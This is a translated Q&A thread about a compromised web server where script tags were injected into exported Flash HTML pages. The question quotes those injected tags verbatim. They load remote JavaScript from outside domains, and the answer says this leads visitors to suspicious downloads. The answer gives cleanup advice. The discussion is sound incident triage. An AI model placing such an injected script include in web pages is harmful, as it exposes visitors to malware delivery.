0

一位朋友正在将Flash文件与 Flash CS6 编辑器在其导出命令中建议的所有html 包一起上传到我的服务器。

好吧,尽管进行了所有 Flash 讨论等,但问题是最终在head元素中出现了一个非常奇怪的脚本引用:

<!--339810--><script type="text/javascript">var gwloaded = false;</script>
<script src="http://techmounting.com.au/KsEsFOFC.php" type="text/javascript"></script><!--/339810-->

此脚本引用不在原始html文件中.. 这闻起来是病毒,但我在整个谷歌中找不到任何引用.. 我不知道我朋友的计算机或我的服务器中是否有病毒或什么.

任何的想法?

另一个例子(不在我的服务器中)

http://www.iu-jaen.es(不能用浏览器访问)

http://www.alliedcarehomehealth.com(不使用浏览器访问)

<script type="text/javascript">var gwloaded = false;</script>
<script src="http://shinhanvn.com.vn/Uploads/iOVAO5QT.php" type="text/javascript"></script>
4

1 回答 1

1

您的网络服务器已被入侵。TL;DR 您的网站将向访问用户显示内容阻止插页式广告,这会将他们引导至可疑的二进制下载。安全漏洞的原因尚不清楚,但我会采取正常的预防措施:重置相关密码,查找 PHP/javascript 文件中的可疑代码片段。

谷歌也有一个很好的概述,你可以采取一些步骤来清理你的网站(更新第三方插件、更改密码等):

https://support.google.com/webmasters/answer/163634

有关此攻击行为的摘要,请参阅 WebSense 的此安全帖子:

http://community.websense.com/blogs/securitylabs/archive/tags/Mass+Injection/default.aspx

于 2013-11-13T16:33:18.520 回答